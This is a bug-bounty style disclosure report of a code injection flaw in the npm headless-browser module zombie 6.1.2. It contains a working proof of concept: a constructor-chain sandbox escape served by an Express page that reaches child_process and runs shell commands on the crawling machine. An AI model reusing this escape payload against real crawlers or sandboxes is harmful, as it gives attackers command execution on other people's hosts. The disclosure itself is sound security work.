severity_rating: high created_at: 2018-08-02 10:47:10 vendor: nodejs-ecosystem bounty_amount:

I would like to report a code injection vulnerability in zombie.
It allows crawled websites to access privileged APIs such as the file system or child process.


module name: zombie
version: 6.1.2
npm page:

Module Description

Insanely fast, headless full-stack testing using Node.js

Module Stats

12,671 downloads in the last week


Vulnerability Description

Attackers can insert JS code in their pages that exploit the zombiejs code injection vulnerability. If such pages are crawled using zombiejs the machine running the crawler will run arbitrary commands provided by the attacker. For comparison, jsdom disable script execution by default.

Steps To Reproduce:

var codeToExec = "var sync=require('child_process').spawnSync; " +
    "var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());";
var exploit = "c='constructor';require=this[c][c]('return process')().mainModule.require;" + codeToExec;
var attackVector = "c='constructor';this[c][c](\"" + exploit + "\")()";
// end exploit

var express = require('express');

var app = express();

app.get('/test', function(req, res) {
    res.send("<script>" + attackVector + "</script>");


const Browser = require('zombie');

// We're going to make requests to
// Which will be routed to our test server localhost:3000
Browser.localhost('', 3000);

const browser = new Browser();
browser.visit('/test', function(a,b) {


N/A make user aware of this issue and offer a way to disable script execution on untrusted crawled pages.

Supporting Material/References:

Wrap up


Analysed webpages can execute privileged commands on the machine running zombiejs. This is especially important if zombiejs is used for building a crawler.


Hacking more